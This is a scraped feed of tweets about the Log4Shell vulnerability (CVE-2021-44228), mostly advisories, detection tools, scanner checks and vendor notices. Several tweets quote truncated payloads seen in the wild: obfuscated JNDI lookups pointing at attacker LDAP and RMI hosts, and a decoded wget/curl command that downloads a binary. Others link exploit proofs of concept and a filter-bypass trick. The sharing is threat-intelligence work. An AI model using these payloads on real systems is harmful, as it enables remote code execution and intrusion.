2022-01-08 05:50:07#CVE-2021 Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more. https://t.co/9kI6j5O6gH https://github.com/puzzlepeaches/Log4jHorizon0x3n0
2022-01-08 00:10:12CISA Log4j (CVE-2021-44228) Affected Vendor &amp; Software List https://t.co/5VyHCIzmVd #infosec #log4j https://4jfinder.github.io/TechLifeWeb
2022-01-07 22:30:07Patch systems vulnerable to critical #Log4j flaws. CVE-2021-44228 is one vulnerability to come to light in the past… https://t.co/XGRln0ZgEj https://twitter.com/i/web/status/1479579924424011779danrami2009
2022-01-07 20:00:08Example CVE-2021-44228 payload: ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//51.79.240.74:1389/Tom… https://t.co/YNnUyMkuzv https://twitter.com/i/web/status/1479542624792956930bad_packets
2022-01-07 19:20:20#Blue_Team_Techniques Backdoor detection for VMware view post Log4j exploitation (CVE-2021-44228) https://t.co/Jg0FFowLIs https://github.com/mr-r3b00t/CVE-2021-44228ksg93rd
2022-01-07 18:20:14This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell. It uses L… https://t.co/qUZjuU8cCw https://twitter.com/i/web/status/1479516418622341121Amaankhan4you
2022-01-07 16:30:29Microsoft’s Response to CVE-2021-44228 Apache Log4j - https://t.co/jJ97BL9tce https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/BuckWoodyMSFT
2022-01-07 15:30:12CVE-2021-44228Epsilon_______
2022-01-07 15:10:58CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-07 15:00:04Scan applications for #log4j vulnerabilities CVE-2021-44228, CVE-2021-45046, &amp; CVE-2021-45105 with HCL AppScan's Op… https://t.co/KkwFENHeMO https://twitter.com/i/web/status/1479467866470690822HCLSoftware
2022-01-07 14:10:28Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-42392: 1.5M (audience size) CVE-2021-44228: 584.7K CVE-2021-4… https://t.co/oK8MpBSGhD https://twitter.com/i/web/status/1479452774815444997CVEtrends
2022-01-07 11:00:11"Cisco Secure and Talos experts discuss CVE-2021-44228 and steps for mitigating the vulnerability." - maybe Cisco c… https://t.co/zV2Ik5pFmn https://twitter.com/i/web/status/1479406107281944578tassiebob1
2022-01-07 09:40:08Docker Hub is displaying a banner at the top of the page, "Get the latest on Apache Log4j 2 CVE-2021-44228 vulnerab… https://t.co/sv7A7wjain https://twitter.com/i/web/status/1479387004534235138i_grr
2022-01-07 09:10:10Stop execution of malicious scripts and malware due to log4Shell #log4j vulnerability CVE-2021-44228 with Deep Inst… https://t.co/y4K8fDyNz1 https://twitter.com/i/web/status/1479379613608468483ItKlaatu
2022-01-07 03:31:10Example CVE-2021-44228 payload: User agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://157.230.… https://t.co/0HhxHlyFQi https://twitter.com/i/web/status/1479293131065479168bad_packets
2022-01-07 02:30:13米国連邦取引委員会(FTC)は1月4日、Apache Log4j 2.xを使用している企業に対し、通称「Log4Shell」と呼ばれるCVE-2021-44228等一連の脆弱性に対処するよう注意喚起。消費者の情報を保護するための適… https://t.co/SbLiN4O51z https://twitter.com/i/web/status/1479278599379521536M_Miho_JPN
2022-01-06 22:54:59Log4Shell (CVE-2021-44228) – What You Need to Know #infosec #infosecurity #cybersecurity #threatintel… https://t.co/5PjRczJjmn https://twitter.com/i/web/status/1479210388155686915CyberIQs_
2022-01-06 20:30:19Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/mBoslINTAB https://twitter.com/i/web/status/1479186510708715521Hfuhs
2022-01-06 18:53:09Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/EzpwzdOGHs https://twitter.com/i/web/status/1479161852512940034gcelosia_
2022-01-06 18:20:38Log4J-Detect – Script To Detect The “Log4j” Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/1IGTUwZYSj https://twitter.com/i/web/status/1479154864475279366PHackersIndia
2022-01-06 18:02:33Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/mlJFK4RLx4 https://twitter.com/i/web/status/1479148302079832071CeptBiro
2022-01-06 17:52:43Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/Q1vfOZ6u1M https://twitter.com/i/web/status/1479146115375190019ReneRobichaud
2022-01-06 17:22:06"The vulnerability, known as CVE-2021-44228, was disclosed on Dec. 9, which allows remote access to servers and cod… https://t.co/jMdWlEwSvD https://twitter.com/i/web/status/1479138776521838595Marie54265436
2022-01-06 16:40:06🚨 Log4J-Detect - Script To Detect The "#Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With… https://t.co/20etzqZe8O https://twitter.com/i/web/status/1479130441919651843Prohacktiv3
2022-01-06 15:41:00https://t.co/o9ZY5P5slh (https://t.co/UDd0QhDQsp) / Server vulnerable to Log4J CVE-2021-44228 https://t.co/PdQqUHDDQT http://Solidaris.be http://emut.be https://leakix.net/reports/4e3f0097-d688-4ac0-853b-d03412c29f19PolBegov
2022-01-06 15:40:59Log4J-Detect – Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/mq11tdEpQk https://twitter.com/i/web/status/1479113241905090560HakTechs
2022-01-06 15:10:24CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-06 14:20:05#VMware #vROps trivially vulnerable to RCE with #log4shell CVE-2021-44228 in the username field. #cybersecurity… https://t.co/JenVp05sgV https://twitter.com/i/web/status/1479095408425160708Horizon3Attack
2022-01-06 14:10:39Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-22045: 1.3M (audience size) CVE-2021-44228: 510.2K CVE-2021-4… https://t.co/11UizvuxL9 https://twitter.com/i/web/status/1479090385662226435CVEtrends
2022-01-06 13:50:08r/t Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With… https://t.co/mNtlyJwL1d https://twitter.com/i/web/status/1479087121499504642profxeni
2022-01-06 13:20:21https://t.co/mH9fFH0fJq - Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) F… https://t.co/TxX8aAw14Y http://earmas.ga https://twitter.com/i/web/status/1479078002449391617ApostolWario
2022-01-06 13:10:28Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/ajLNn2GKbz https://twitter.com/i/web/status/1479075637688213505jbhall56
2022-01-06 13:00:14Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/IZUaGmH7tr https://twitter.com/i/web/status/1479073310709321734FilipiPires
2022-01-06 13:00:09Detect – Script To Detect The “Log4j” Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Multithre… https://t.co/047cANM1p6 https://twitter.com/i/web/status/1479073484655448071eshieldsecure
2022-01-06 13:00:05Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/wpjL76k3OY https://twitter.com/i/web/status/1479075107305705474beingsheerazali
2022-01-06 13:00:04Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/7P4rcuYFUA https://twitter.com/i/web/status/1479075113966264320beingsheerazali
2022-01-06 12:50:14"RT Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With… https://t.co/pDRA3tsXMK https://twitter.com/i/web/status/1479070382233722882securisec
2022-01-06 12:50:03Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/0bpq3ABl1Y https://twitter.com/i/web/status/1479072484255313921Asesores_Brito
2022-01-06 12:40:18Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/c8oIVlAAI4 https://twitter.com/i/web/status/1479068695422980099buaqbot
2022-01-06 12:30:08Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Multithreadingsquadpirates
2022-01-06 12:30:05Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/6hrPrQgoYM https://twitter.com/i/web/status/14790671392817192963m1l
2022-01-06 12:30:04More Log4j fallout. Watch those pipelines, kids. The critical vulnerability, tracked as CVE-2021-44228 came to li… https://t.co/KZosNmgQQR https://twitter.com/i/web/status/1479067679638044679sking1145
2022-01-06 12:20:20Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/fg7gnZqnWi https://twitter.com/i/web/status/1479063826356129792santosomar
2022-01-06 12:20:18Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/4RjkEYax0C https://twitter.com/i/web/status/1479063956895457284KitPloit
2022-01-06 12:20:14Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/reTC8An1jZ https://twitter.com/i/web/status/1479063980404580354Chahali
2022-01-06 12:20:08Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/iRmClHSckt https://twitter.com/i/web/status/1479064113808613378LudovicoLoreti
2022-01-06 12:20:07Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/wYhxJHCHPn https://twitter.com/i/web/status/1479064771475521537Seven_Stones
2022-01-06 12:20:05Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/HqHOblSQb8 https://twitter.com/i/web/status/1479064808444026880angelart07
2022-01-06 12:10:12Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/41EQuoxrXm https://twitter.com/i/web/status/1479060939299242006RedPacketSec
2022-01-06 12:00:04Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/XfnfiHRrvi https://twitter.com/i/web/status/1479059548430340099buaqbot
2022-01-06 11:50:04Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/pqhiG9pk5c https://twitter.com/i/web/status/1479056109637939202CEOofDSS
2022-01-06 11:40:09Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/MkEwuT8Ywh https://twitter.com/i/web/status/1479053869258874880_drewlong
2022-01-06 11:40:05Log4J-Detect - Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Mul… https://t.co/xuvHJqFAMK https://twitter.com/i/web/status/1479054019678986241AcooEdi
2022-01-06 11:00:10The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/ePgrANwDyU https://twitter.com/i/web/status/1479043153558749188KellyStefaniGo1
2022-01-06 11:00:09The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/uznrigYTCn https://twitter.com/i/web/status/1479043234873626627KellyStefaniGo1
2022-01-06 10:30:05HANA XSA log4j CVE-2021-44228 | SAP Blogs https://t.co/KS2R9uIheN https://t.co/bbQHCjKNV0 https://bit.ly/3t3qshwsbuisel
2022-01-06 09:40:06「Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート」の内容を更新しました|NTTデータ先端技術 「Apache Log4jに関する解説 1.5版」… https://t.co/c3JNzpDhWS https://twitter.com/i/web/status/1479022814955184134intellilink_pr
2022-01-06 08:10:53#Apache Solr Log4Shell Direct Check (CVE-2021-44228) https://t.co/TQ4J6ECmX8 #Nessus https://www.tenable.com/plugins/nessus/156471SecurityNewsbot
2022-01-06 06:50:34CVE-2021-44228 #Backdoor detection for #VMware view post Log4j exploitation (#CVE-2021-44228)… https://t.co/gf0m0o0yCq https://twitter.com/i/web/status/1478980393995051013hack_git
2022-01-06 05:30:12Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation https://t.co/wjJUWMBaIV… https://t.co/bZi0iSY31l https://lekimastore.com/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/ https://twitter.com/i/web/status/1478961629756891137lekimastores
2022-01-06 05:20:22Apache OFBiz Log4Shell Direct Check (CVE-2021-44228) https://t.co/qk2ogBzLxo https://ift.tt/3325q7Ucc_cyberdefence
2022-01-06 05:00:10Cloud Armor WAF rule to help address CVE-2021-44228 Apache Log4j vulnerability. If you're still fighting this 🔥 https://t.co/WtiAWEeBXn https://cloud.google.com/blog/products/identity-security/cloud-armor-waf-rule-to-help-address-apache-log4j-vulnerabilityjamieeduncan
2022-01-06 04:40:18GitHub Trending Archive, 04 Jan 2022, Java. logpresso/CVE-2021-44228-Scanner, gz-yami/mall4cloud, Azure/azure-sdk-f… https://t.co/BBv8ZJm1Qe https://twitter.com/i/web/status/1478946973327978497motakasoft
2022-01-06 04:11:04FireEye Knowledge Base | 🔖 The article, Information on Endpoint Security Coverage for CVE-2021-44228 has been upda… https://t.co/TYYXPZSzqo https://twitter.com/i/web/status/1478939395101179906FireEyeSupport
2022-01-06 04:10:08Messing with the Log4j exploit (CVE-2021-44228) - Late to the party. https://t.co/oQk5WFG3VGTheJacobDrury
2022-01-06 03:40:58#Blue_Team_Techniques Backdoor detection for VMware view post Log4j exploitation (CVE-2021-44228) https://t.co/Jg0FFowLIs https://github.com/mr-r3b00t/CVE-2021-44228ksg93rd
2022-01-06 02:40:15「CVE-2021-44228」が「Log4Shell」と呼ばれているのは知っていますが…、 "Log4j 2に報告されている一連の脆弱性(CVE-2021-44228、CVE-2021-45046、CVE-2021-44832… https://t.co/xfFYDmXVB6 https://twitter.com/i/web/status/1478918408624549888VELO_ch
2022-01-06 01:00:05警察庁のページによると、日本では確かに攻撃が減ってはいそうなんだよな。/ Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした攻撃の観測について… https://t.co/gLrXNm1GFn https://twitter.com/i/web/status/1478892469563850758yamadamn
2022-01-05 23:50:36.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/j7KE2yZBrv https://twitter.com/i/web/status/1478875140201005068Woronka
2022-01-05 23:50:08Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://t.co/2XdfZClQcF @jpcert https://www.jpcert.or.jp/at/2021/at210050.htmlnon_it_info
2022-01-05 23:20:05Apache Solr Log4Shell Direct Check (CVE-2021-44228) https://t.co/fiCQI4znQ2 https://ift.tt/32KFM81cc_cyberdefence
2022-01-05 22:50:21Apache log4j Vulnerability CVE-2021-44228: Analysis and Mitigations @PaloAltoNtwks https://t.co/VuoctrQ7rN https://t.co/KsyTXZxcIy https://buff.ly/3IzYgIpHigheringAI
2022-01-05 22:50:04An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/4OQuhS0BZi https://twitter.com/i/web/status/1478861153912733701ProductCERT
2022-01-05 21:20:24Active IQ Unified Manager for RHEL: CVE-2021-44228 Apache Log4j Vulnerability – Workaround https://t.co/TYsQMAwt0x… https://t.co/6XQq8htMY3 https://ntap.com/3zrVLDT https://twitter.com/i/web/status/1478836362459574272NetAppAssist
2022-01-05 21:10:04Which #CVEs 🚨 were mentioned the most times? 1. CVE-2021-44228: https://t.co/du0usAt4zY 2. CVE-2021-3449:… https://t.co/dx9mcfleQR https://nvd.nist.gov/vuln/detail/CVE-2021-44228 https://twitter.com/i/web/status/1478835913463640069appd8_io
2022-01-05 20:00:04CVE-2021-44228 https://t.co/nm9AmYOwGB https://t.co/Cv8KIi8Dyu https://ift.tt/3GaT2AY https://ift.tt/3sZLgpZbuaqbot
2022-01-05 19:54:04The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/RN81Bc8Vgh https://twitter.com/i/web/status/1478813802581876736velez1066
2022-01-05 19:54:02The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/uY7CpyeT4C https://twitter.com/i/web/status/1478813946421424140velez1066
2022-01-05 19:20:07CVE-2021-44228 https://t.co/nm9AmYOwGB https://t.co/D9GUZFKWj5 https://ift.tt/3GaT2AY https://ift.tt/3f0kiWVbuaqbot
2022-01-05 17:50:05Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/HzvV7crvuL https://dy.si/VTuNf42fixxxer
2022-01-05 17:10:15On December 10, NIST disclosed a vulnerability CVE-2021-44228, with regards to log4j package version 2.0-beta9 thro… https://t.co/xP9fmZedXj https://twitter.com/i/web/status/1478773522243756041CMFirstGroup
2022-01-05 15:10:19CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-05 15:10:17Our Co-founder &amp; CTO, @LBelkind, explains how you can mitigate the next CVE-2021-44228 (a.k.a. #Log4Shell) and auto… https://t.co/mUIIoovy9i https://twitter.com/i/web/status/1478743195727151108torq_io
2022-01-05 14:20:04CVE-2021-44228 Backdoor detection for VMware view horizon https://t.co/Xndiej3J45 https://github.com/mr-r3b00t/CVE-2021-44228stevematindi
2022-01-05 14:10:09Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-22045: 134K (audience size) CVE-2021-44228: 133.8K CVE-2021-4… https://t.co/3YdnaDw88k https://twitter.com/i/web/status/1478727997662314501CVEtrends
2022-01-05 13:50:13CVE-2021-44228: Backdoor detection for VMware Horizon post Log4J exploitation - based on real intrusions. https://t.co/fpW0R3B4pa https://github.com/mr-r3b00t/CVE-2021-442280x3n0
2022-01-05 09:30:06The attacks on the original #log4j CVE , CVE-2021-44228 are still the big risk. This is the target first and foremo… https://t.co/KM453NDyKQ https://twitter.com/i/web/status/1478658541745491968llkkaT
2022-01-05 07:50:52[2021-12-30 09:25 PST更新を反映] 脅威に関する情報: Apache Log4jに新たな脆弱性(CVE-2021-44228) 実際の悪用も確認 https://t.co/vQ04h8VETb https://unit42.paloaltonetworks.jp/apache-log4j-vulnerability-cve-2021-44228/housu_jp
2022-01-05 07:50:36IT Risk: Apache.Multiple vulnerabilities in log4j2 (UPDATE) -2/2 CVE-2021-45105 CVE-2021-45046 CVE-2021-44832 CVE-2021-44228 CVE-2021-4104management_sun
2022-01-05 07:40:49Tracking the prevalence of activity associated with #Log4j reveals (CVE-2021-44228) - now stands at 68 countries wh… https://t.co/D5AIXsAmGU https://twitter.com/i/web/status/1478631460949184514Raj_Samani
2022-01-05 07:40:09IT Risk: Apache.log4j2に複数の脆弱性(UPDATE) -2/2 CVE-2021-45105 CVE-2021-45046 CVE-2021-44832 CVE-2021-44228 CVE-2021-4104management_sun
2022-01-05 04:20:05更新: 2022年1月4日記載 Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://t.co/VOqOZQtRzK @jpcert https://www.jpcert.or.jp/at/2021/at210050.htmlpstgtom
2022-01-05 03:51:07CVE-2021-44228 RCE vulnerability affecting Apache’s Log4j library, versions 2.0-beta9 to 2.14.1 —in action Java Na… https://t.co/NG6ZB24IJN https://twitter.com/i/web/status/1478574108833202177stuarts_world_
2022-01-05 03:20:39JPCERTの情報が更新されましたね Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://t.co/WNMvnwnZLI @jpcert https://www.jpcert.or.jp/at/2021/at210050.htmlhomma_classact
2022-01-04 22:10:06@ApacheStorm Any remediation for Log4j CVE-2021-44228 vulnerability? Couldn't find any information.hsteven29
2022-01-04 21:30:05An update on the Apache Log4j CVE-2021-44228 vulnerability - IBM PSIRT Blog https://t.co/n5dxLVTbcr Schedule a fre… https://t.co/gN5Ry6oUnz https://buff.ly/3m6WlBi https://twitter.com/i/web/status/1478477851213144076KolnGroup
2022-01-04 19:50:45#log4shell logpresso-log4j2-scan.jar --fix option vulnerabilities: Log4j v2 - CVE-2021-44228 (JndiLookup), CVE-2021… https://t.co/hrfSihXybr https://twitter.com/i/web/status/1478451718606176259fpientka
2022-01-04 17:10:09log4j 2021 12 11 13 43 13(CVE-2021-44228) https://t.co/IxXw01LEDz 출처 @YouTube https://youtu.be/aFcHNs78X74Luna_0x01
2022-01-04 15:40:40Published in response to CVE-2021-44228, this playbook and its sub-playbooks can be used to investigate and respond… https://t.co/HROz6c7Xjo https://twitter.com/i/web/status/1478388280378937346mattdavies_uk
2022-01-04 15:40:04The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/v98qgF61uV https://t.co/5qFX5vtLVj https://bit.ly/3eQ7um6BilekSimon
2022-01-04 15:10:22CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-04 14:00:07Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 471.5K (audience size) CVE-2017-5816: 226.4K CVE-2021-… https://t.co/Soj5w6J0wD https://twitter.com/i/web/status/1478365608160989186CVEtrends
2022-01-04 13:40:19Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/QuzW8Xr1Pa https://dy.si/1PEzfLimalowan
2022-01-04 11:30:19Exploiting #CVE-2021-44228 using PDFs as delivery channel - #PoC https://t.co/qqogcYQyRG https://github.com/eelyvy/log4jshell-pdfcyberguideme
2022-01-04 08:50:10❗ Are you caught up on the latest information on #CVE-2021-44228? Check out @CISAgov’s #Log4j Vulnerability Guidanc… https://t.co/jLw9WNSHyR https://twitter.com/i/web/status/1478287216526991364hernanespinoza
2022-01-04 08:40:30脆弱性「Log4Shell(CVE-2021-44228)」とは別の脆弱性「CVE-2021-44832(※)」の対応分ですね。アップデートで対処可能です。 ※:リモート実行の脆弱性 https://t.co/uBCUbB4Om0 https://twitter.com/jpcert/status/1478264415464361991VELO_ch
2022-01-04 07:30:28注意喚起: Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 (更新) 2022-01-04T15:45+09:00 https://t.co/OORB6reATN 全確保支援士NEWS https://www.jpcert.or.jp/at/2021/at210050.htmlkai_ri_0001
2022-01-04 07:20:10Apache Log4jにおける脆弱性(CVE-2021-44228)に関する注意喚起を更新。バージョン2.17.1(Java 8以降のユーザー向け)、2.12.4(Java 7のユーザー向け)及び2.3.2(Java 6のユーザ… https://t.co/6S9f7411KB https://twitter.com/i/web/status/1478264415464361991jpcert
2022-01-04 04:40:40Apache log4j Vulnerability CVE-2021-44228: Analysis and Mitigations https://t.co/QEOUZm9TZL https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/PVynckier
2022-01-04 04:30:3775% of our customers still have a least one running asset that’s affected by Log4j (CVE-2021-44228, CVE-2021-4104,… https://t.co/uXg7dJxZDp https://twitter.com/i/web/status/1478221525736165377AlirezaGhahrood
2022-01-04 00:16:03❗ Are you caught up on the latest information on #CVE-2021-44228? Check out @CISAgov’s #Log4j Vulnerability Guidanc… https://t.co/9WdnADwhuC https://twitter.com/i/web/status/1478155391858970624USCERT_gov
2022-01-03 20:13:06Apache Log4J vulnerability (CVE-2021-44228) AKA log4Shell, is a zero-day vulnerability which earned a CVSS score o… https://t.co/RkDJAdnCjY https://twitter.com/i/web/status/1478093926888214528Clearinfosec1
2022-01-03 18:40:11Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/bWTKY5WZes https://dy.si/d5EbtX2eugenejtorres
2022-01-03 15:10:49CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-03 01:50:14@jmeller @kolide Reminds me of how CVE-2021-44228 had been previously disclosed and demonstrated at Black Hat in 20… https://t.co/4SWfh1uMk5 https://twitter.com/i/web/status/1477819123526688777iamgune
2022-01-03 01:30:26Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation https://t.co/KcAIdS0Fy6… https://t.co/OU4HLjpE2X https://buff.ly/3sUSvzt https://twitter.com/i/web/status/1477813465721053188kikikimbro
2022-01-02 19:00:40The attempted intrusion exploited the newly discovered Log4Shell flaw (CVE-2021-44228, CVSS score: 10.0) to gain ac… https://t.co/V2viywOP4N https://twitter.com/i/web/status/1477713811360595968MarkoGulan
2022-01-02 17:11:01Published in response to CVE-2021-44228, this playbook and its sub-playbooks can be used to investigate and respond… https://t.co/xtsvtoZnJu https://twitter.com/i/web/status/1477686381547700224PhilippeDARLEY
2022-01-02 17:10:29AzureのWAFポリシー、OWASP CRS3.0にルール増えてた rules/Known-CVEs.conf 800100 Remote Command Execution: Log4j CVE-2021-44228 3.1/… https://t.co/hNLXpuNnTe https://twitter.com/i/web/status/1477688300463063046hsakoh
2022-01-02 15:11:29CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-02 09:10:36Products from SSH Communications Security are NOT AFFECTED by the critical CVE-2021-44228 Remote Code Execution vul… https://t.co/Vp1Fb1cfRJ https://twitter.com/i/web/status/1477566077622272005SSH
2022-01-02 08:20:19Ubiquiti UniFi Network Log4Shell Direct Check (CVE-2021-44228) https://t.co/OdVWBpa1f3 https://ift.tt/3sNO1L9cc_cyberdefence
2022-01-01 23:03:34Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/869brtviDt https://bit.ly/3eJbvIQDanMar224
2022-01-01 23:03:09Investigating CVE-2021-44228 Log4Shell… https://t.co/ZTalKFLGjS https://danmarsolutions.wordpress.com/2022/01/01/investigating-cve-2021-44228-log4shell/DanMar224
2022-01-01 21:41:34Example CVE-2021-44228 payload: User agent: ${jndi:ldap://107.172.214.23:8001/1641070031.0703578} ${${::-j}ndi:rmi… https://t.co/S20bt9Yvm4 https://twitter.com/i/web/status/1477393341541089280bad_packets
2022-01-01 18:31:35CVE-2021-44228 https://t.co/NLm0RVfEs8 #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-01 17:50:16The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/xkL4bLzOuP https://twitter.com/i/web/status/1477335506945982464JonnyW_S
2022-01-01 16:20:06The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/iU0BkQr094 https://t.co/O1Yikrqlu5 https://bit.ly/3FXCcp6dwood87
2022-01-01 15:11:36CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-01 15:11:19The complexity of this vulnerability is higher than the original CVE-2021-44228 since it requires the attacker to h… https://t.co/YQdQh8AdeM https://twitter.com/i/web/status/1477293699763736581FreddyNt2301
2022-01-01 14:52:53Demo: Mitigating Log4Shell (CVE-2021-44228) with NSX https://t.co/RwWejH6oUK https://bit.ly/3mInYB9mastr79
2022-01-01 10:24:43unlimitedsola/log4j2-rce-poc: A bare minimum proof-of-concept for Log4j2 JNDI RCE vulnerability (CVE-2021-44228/Log… https://t.co/YIglkShkRh https://twitter.com/i/web/status/1477221762211459074buaqbot
2022-01-01 08:50:25🐱‍💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - A trick to bypass words blocking patches https://t.co/1EZ8IYpgKq… https://t.co/hlOCS6ClqQ https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words https://twitter.com/i/web/status/1477200409945157637Anastasis_King
2022-01-01 03:42:00Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)の更新情報 https://t.co/jj8nf4a0uy https://www.jpcert.or.jp/at/2021/at210050.htmlWhyRabIt
2022-01-01 01:08:04Demo: Mitigating Log4Shell (CVE-2021-44228) with NSX https://t.co/18WqLxFlQ8 https://bit.ly/32FeKyHSarge_Siddiqui
2021-12-31 23:20:24Ubiquiti UniFi Network Log4Shell Direct Check (CVE-2021-44228) https://t.co/2y5wT7Bm0G #Nessus https://www.tenable.com/plugins/nessus/156441SecurityNewsbot
2021-12-31 23:20:08Example CVE-2021-44228 payload (decoded): wget http://2.58.149.206/reader; curl -O http://2.58.149.206/reader; chmo… https://t.co/gOLbGHCLrE https://twitter.com/i/web/status/1477056560585056258bad_packets
2021-12-31 21:41:03The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/Irog1UEyiG https://twitter.com/i/web/status/1477030655913566213velez1066
2021-12-31 21:40:43The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/wBlRdZuKQk https://twitter.com/i/web/status/1477030725501259776velez1066
2021-12-31 21:10:35Log4Shell (CVE-2021-44228) is bad, but that doesn’t mean everything is bad. Even F5 Labs’ resident pessimist thinks… https://t.co/BwRtzZInn1 https://twitter.com/i/web/status/1477022008332455940skubina123
